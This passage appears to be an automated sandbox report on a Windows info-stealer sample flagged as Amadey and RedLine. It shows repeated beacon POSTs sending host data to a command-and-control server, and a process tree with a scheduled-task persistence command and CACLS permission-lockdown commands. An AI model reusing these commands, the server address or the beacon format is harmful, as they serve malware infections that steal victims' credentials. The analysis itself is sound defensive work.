                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:11.715651035 CET210INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    90192.168.2.34979262.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:41.968818903 CET291OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:42.032325029 CET291INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    91192.168.2.34979362.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:42.202188969 CET292OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:42.270839930 CET292INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    92192.168.2.34979462.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:42.450951099 CET293OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:42.513572931 CET293INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    93192.168.2.34979562.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:42.683943987 CET294OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:42.746000051 CET294INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    94192.168.2.34979662.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:42.929790974 CET295OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:42.994865894 CET295INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    95192.168.2.34979762.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:43.170404911 CET296OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:43.236171007 CET296INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    96192.168.2.34979862.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:43.430749893 CET297OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:43.495352983 CET297INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    97192.168.2.34979962.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:43.671152115 CET298OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:43.735203028 CET298INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    98192.168.2.34980062.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:43.904290915 CET299OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:43.967133045 CET299INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                    99192.168.2.34980162.204.41.480C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    TimestampkBytes transferredDirectionData
                                                                    Feb 8, 2023 21:31:44.140311003 CET300OUTPOST /Gol478Ns/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 62.204.41.4
                                                                    Content-Length: 87
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 35 37 31 33 34 35 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                                    Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=571345&un=user&dm=&av=13&lv=0&og=1
                                                                    Feb 8, 2023 21:31:44.205696106 CET300INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Wed, 08 Feb 2023 20:31:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 6<c><d>0


                                                                    Click to jump to process

                                                                    Click to jump to process

                                                                    Click to dive into process behavior distribution

                                                                    Click to jump to process

                                                                    Target ID:0
                                                                    Start time:21:30:00
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\Desktop\file.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\Desktop\file.exe
                                                                    Imagebase:0x11d0000
                                                                    File size:582144 bytes
                                                                    MD5 hash:392470D5B5723C386B943751C15721A6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.261384983.0000000004B55000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:low

                                                                    Target ID:1
                                                                    Start time:21:30:01
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\bmMg.exe
                                                                    Imagebase:0xf80000
                                                                    File size:391168 bytes
                                                                    MD5 hash:03D901B08C7DE9A3C6323A8C6DF73569
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low

                                                                    Target ID:2
                                                                    Start time:21:30:01
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\amMl.exe
                                                                    Imagebase:0x400000
                                                                    File size:372736 bytes
                                                                    MD5 hash:AD3805672C5FE617D88DCE7E50E56B9F
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Yara matches:
                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000002.00000002.367095576.0000000000767000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000002.366895867.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000002.00000002.366986826.00000000005B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000002.00000003.343232585.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000002.00000003.343232585.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:low

                                                                    Target ID:7
                                                                    Start time:21:30:12
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                    Imagebase:0x7ff673770000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:11
                                                                    Start time:21:30:20
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                    Imagebase:0x7ff673770000
                                                                    File size:69632 bytes
                                                                    MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high

                                                                    Target ID:14
                                                                    Start time:21:30:50
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\nika.exe
                                                                    Imagebase:0xa00000
                                                                    File size:11264 bytes
                                                                    MD5 hash:7E93BACBBC33E6652E147E7FE07572A0
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:.Net C# or VB.NET
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:moderate

                                                                    Target ID:15
                                                                    Start time:21:31:06
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe
                                                                    Imagebase:0x11d0000
                                                                    File size:241664 bytes
                                                                    MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000002.403134166.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 0000000F.00000000.400766948.00000000011D1000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\xriv.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:moderate

                                                                    Target ID:16
                                                                    Start time:21:31:06
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe"
                                                                    Imagebase:0x830000
                                                                    File size:241664 bytes
                                                                    MD5 hash:8BB923C4D81284DAEF7896E5682DF6C6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000000.402656135.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000010.00000002.785793369.000000000113A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000010.00000002.785140671.0000000000831000.00000020.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000010.00000002.785793369.00000000010FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey, Description: Yara detected Amadey bot, Source: 00000010.00000002.785793369.0000000001161000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe, Author: Joe Security
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    Reputation:moderate

                                                                    Target ID:17
                                                                    Start time:21:31:07
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN mnolyk.exe /TR "C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe" /F
                                                                    Imagebase:0x1330000
                                                                    File size:185856 bytes
                                                                    MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:18
                                                                    Start time:21:31:07
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff745070000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:19
                                                                    Start time:21:31:07
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "mnolyk.exe" /P "user:N"&&CACLS "mnolyk.exe" /P "user:R" /E&&echo Y|CACLS "..\4b9a106e76" /P "user:N"&&CACLS "..\4b9a106e76" /P "user:R" /E&&Exit
                                                                    Imagebase:0xb0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:20
                                                                    Start time:21:31:07
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff745070000
                                                                    File size:625664 bytes
                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:21
                                                                    Start time:21:31:08
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                    Imagebase:0xb0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:22
                                                                    Start time:21:31:08
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\cacls.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:CACLS "mnolyk.exe" /P "user:N"
                                                                    Imagebase:0x830000
                                                                    File size:27648 bytes
                                                                    MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:23
                                                                    Start time:21:31:08
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\cacls.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:CACLS "mnolyk.exe" /P "user:R" /E
                                                                    Imagebase:0x830000
                                                                    File size:27648 bytes
                                                                    MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:24
                                                                    Start time:21:31:08
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                    Imagebase:0xb0000
                                                                    File size:232960 bytes
                                                                    MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:25
                                                                    Start time:21:31:09
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\cacls.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:CACLS "..\4b9a106e76" /P "user:N"
                                                                    Imagebase:0x830000
                                                                    File size:27648 bytes
                                                                    MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:26
                                                                    Start time:21:31:09
                                                                    Start date:08/02/2023
                                                                    Path:C:\Windows\SysWOW64\cacls.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:CACLS "..\4b9a106e76" /P "user:R" /E
                                                                    Imagebase:0x830000
                                                                    File size:27648 bytes
                                                                    MD5 hash:4CBB1C027DF71C53A8EE4C855FD35B25
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language

                                                                    Target ID:27
                                                                    Start time:21:31:10
                                                                    Start date:08/02/2023
                                                                    Path:C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
